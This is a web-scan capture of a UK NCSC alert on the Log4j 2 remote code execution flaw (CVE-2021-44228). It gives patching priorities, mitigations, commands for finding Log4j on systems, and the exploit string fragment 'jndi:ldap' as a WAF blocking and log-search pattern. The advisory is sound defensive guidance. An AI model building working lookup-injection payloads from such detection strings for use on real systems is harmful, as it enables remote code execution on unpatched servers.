www.ncsc.gov.uk
Open in
urlscan Pro
65.9.68.7
Public Scan
Submitted URL: https://information.crowncommercial.gov.uk/e/811463/ews-apache-log4j-vulnerability/tgn22/399588411?h=al1zorBAcvxhnPuBKuFmr95ODw6Fp1Ez1uso4J...
Effective URL: https://www.ncsc.gov.uk/news/apache-log4j-vulnerability
Submission: On December 14 via manual from IN — Scanned from DE
Effective URL: https://www.ncsc.gov.uk/news/apache-log4j-vulnerability
Submission: On December 14 via manual from IN — Scanned from DE
Form analysis 0 forms found in the DOM
Text Content
You need to enable JavaScript to run this app.
COOKIES ON THIS SITE
We use some essential cookies to make this website work.
We’d like to set additional cookies to understand how you use our website so we
can improve our services.
Accept optional cookies
Reject optional cookies
Manage Cookies (opens in a new tab)
WRITTEN FOR
This section shows the list of targeted audiences that the article is written
for
Close
Skip to main content
* ABOUT NCSC
* CiSP
* REPORT AN INCIDENT
* CONTACT US
Search
Menu
HomeInformation for...Advice & guidanceEducation & skillsProducts &
servicesNews, blogs, events...
* Home
* »
Alert: Apache Log4j 2 vulnerability (CVE-2021-44228)
NEWS
Download / Print article PDF
SHARE
Copied to clipboard
SHARE
FACEBOOK
LINKEDIN
TWITTER
COPY LINK
Copied to clipboard
SHARE
FACEBOOK
LINKEDIN
TWITTER
COPY LINK
ALERT: APACHE LOG4J 2 VULNERABILITY (CVE-2021-44228)
The NCSC is advising organisations to take steps to mitigate the Apache Log4j 2
vulnerability.
14 December 2021
UPDATE (13/12/21)
This alert has been revised and now includes detection and enhanced mitigation
advice.
An unauthenticated remote code execution vulnerability (CVE-2021-44228) is
affecting multiple versions of the Apache Log4j 2 library. The NCSC is aware
that scanning and attempted exploitation is being detected globally, including
the UK.
Proof-of-concept code has been published for this vulnerability.
--------------------------------------------------------------------------------
DETAILS
Log4j 2 is an open-source Java logging library developed by the Apache
Foundation. It is widely used in many applications and is present in many
services as a dependency. This includes enterprise applications, including
custom applications developed within an organisation, as well as numerous cloud
services.
The Log4j 2 library is frequently used in enterprise Java software and is
included in Apache frameworks including:
* Apache Struts2
* Apache Solr
* Apache Druid
* Apache Flink
* Apache Swift
Other large projects Including Netty, MyBatis and the Spring Framework also make
use of the library.
An application is vulnerable if it consumes untrusted user input and passes this
to a vulnerable version of the Log4j logging library.
Version 1 of the Log4j library is no longer supported and is affected by
multiple security vulnerabilities. Developers should migrate to the latest
version of Log4j 2.
More information is available at:
* log4j/2 security
* log4j/2 download
--------------------------------------------------------------------------------
RECOMMENDED PRIORITY ACTIONS
1. 1
INSTALL THE LATEST UPDATES IMMEDIATELY WHEREVER LOG4J IS KNOWN TO BE USED
This should be the first priority for all UK organisations using software
that is known to include Log4j.
The Log4j 2 library is frequently used in software and the links below
provide a non-exhaustive lists of vulnerable products:
* Mvnrepository - Artifacts using Apache Log4j Core
* Github - Log4j overview related software
If your specific product is not listed, you can use the instructions
provided below in Priority Action 2 to try and determine if Log4j is
present. If your product is listed, please follow vendor advice on updating
the software or applying mitigations. You should also keep refreshing the
list in case a new product has been added. If your product is not listed and
is vulnerable, you can request it be added to the list.
Where a vendor has not provided an update to a product, the vulnerability
can be mitigated in previous releases of Log4j 2 (2.10 and later) by setting
system property "log4j2.formatMsgNoLookups" to "true" or removing the
JndiLookup class from the classpath.
Organisations should routinely run vulnerability scanning across their
networks, to detect when updates are available.
2. 2
DISCOVER UNKNOWN INSTANCES OF LOG4J WITHIN YOUR ORGANISATION
To support the first priority action above, you also should now determine if
Log4j is installed elsewhere. Java applications can include all the
dependent libraries within their installation.
A file system search for log4j can be undertaken. This should include
searching inside EAR, JAR and WAR files. For example:
find / -type f -print0 |xargs -n1 -0 zipgrep -i log4j2 2>/dev/null
If a dependency or package manager is used, this can be searched. For
example:
dpkg -l | grep log4j
There could be multiple copies of Log4j present, each copy will need to be
updated or mitigated.
3. 3
DEPLOY PROTECTIVE NETWORK MONITORING/BLOCKING
The following recommendations should be taken to improve network monitoring
and blocking:
* Organisations using Web Application Firewalls (WAFs) should ensure rules
are available to protect against this vulnerability. These could include
blocking URLs containing strings like “jndi:ldap”. It should be noted
that variants of the exploit string may bypass current WAF rules. This
means WAFs should not be relied on as the only control.
* The log files for any services using affected Log4j versions could
contain user-controlled strings. For example, “jndi:ldap”.
* If your organisation is storing netflow data for your network’s internet
connections, or you have robust EDR coverage of servers, you should
search for internally initiated LDAP connections to external destinations
not seen before 10 December 2021. This may indicate exploitation and if
detected, you should search the initiating host for the presence of Log4j
using the above methods. DNS queries by the server around the LDAP
connection should also be reviewed as sensitive information could have
been exfiltrated over DNS.
* YARA rules for a variety of scenarios are available should organisations
have the tooling to query using them: log4j RCE Exploitation Detection
--------------------------------------------------------------------------------
ADDITIONAL INFORMATION
ADVICE TO DEVELOPERS OF AFFECTED SOFTWARE
It may not always be easy for organisations to identify which products use
Apache Log4j 2 software. If you are a developer of any affected software, the
NCSC advises early communication with your customers to enable them to apply
mitigations or install updates where they are available.
NCSC TOOLS, SERVICES AND GUIDANCE
The NCSC provides a range of free tools and services that help to secure
systems:
* Follow NCSC guidance including Preventing Lateral Movement
* Sign up for Early Warning
* Central government departments can take advantage of NCSC Host Based
Capability
* Vulnerability Disclosure Toolkit – ensure organisations have a basic approach
to receiving reports from researchers who might discover the presence of
vulnerable Log4j systems.
REPORTING A COMPROMISE
Affected UK organisations should report any evidence of compromise relating to
this vulnerability to the NCSC via our website https://report.ncsc.gov.uk/
The NCSC is aware of widespread scanning for this vulnerability and we note that
almost all organisations will have received HTTP requests with the JNDI string.
We do not require reports of scanning activity. However please notify the NCSC
of any cases where you have identified malicious Java being loaded into one of
your systems, or where any follow-on activity has occurred.
TOPICS
Vulnerabilities
Back to top
Download / Print article PDF
SHARE
Copied to clipboard
SHARE
FACEBOOK
LINKEDIN
TWITTER
COPY LINK
Copied to clipboard
SHARE
FACEBOOK
LINKEDIN
TWITTER
COPY LINK
* PUBLISHED
* 10 December 2021
* NEWS TYPE
* Alert
* WRITTEN FOR
* Large organisations
* Public sector
* Cyber security professionals
Was this article helpful?
Yes
No
* PUBLISHED
* 10 December 2021
* NEWS TYPE
* Alert
* WRITTEN FOR
* Large organisations
* Public sector
* Cyber security professionals
Was this article helpful?
Yes
No
Back to top
ALSO SEE
WEEKLY THREAT REPORT 10TH DECEMBER 2021
The NCSC's weekly threat report is drawn from recent open source reporting.
* report
* 10 December 2021
GUIDANCE FOR RETAILERS TO PREVENT WEBSITES BECOMING BLACK FRIDAY CYBER TRAPS
The NCSC encourages small online shops to protect their customers from cyber
criminals over key shopping period.
* news
* 22 November 2021
WEEKLY THREAT REPORT 19TH NOVEMBER 2021
The NCSC's weekly threat report is drawn from recent open source reporting.
* report
* 19 November 2021
FOLLOW US
*
*
*
*
ABOUT NCSC
* What we do
* What is cyber security?
* Incident management
* Leadership team
* Careers
* Media centre
INFORMATION FOR...
* Individuals & families
* Self employed & sole traders
* Small & medium sized organisations
* Large organisations
* Public sector
* Cyber security professionals
ADVICE & GUIDANCE
* All topics
* All articles
* Cyber Aware
EDUCATION & SKILLS
* Schools
* Higher education
* Professional skills & training
* Working with the NCSC
* CyBOK
* Research & Academia
* CyberFirst
PRODUCTS & SERVICES
* Overview
* Browse products & services
* Verify a supplier
* NCSC certification
* Evaluation partners
* Cyber Essentials
* Active Cyber Defence (ACD)
KEEP UP TO DATE
* NCSC news
* Reports & advisories
* Weekly threat reports
* NCSC blog
* Speeches
* CYBERUK 2022
ABOUT THIS WEBSITE
* Privacy notice
* Cookie policy
* Accessibility
* Terms & conditions
* Social media policy
USEFUL LINKS
* GCHQ
* MI5
* SIS
* CPNI
* GOV.UK
CONTACT THE NCSC
* General enquiries
* Report an incident
* Report a vulnerability
* Report phishing scam
SEARCH
Search
POPULAR SEARCHES
Cyber Aware
Coronavirus
Phishing
5G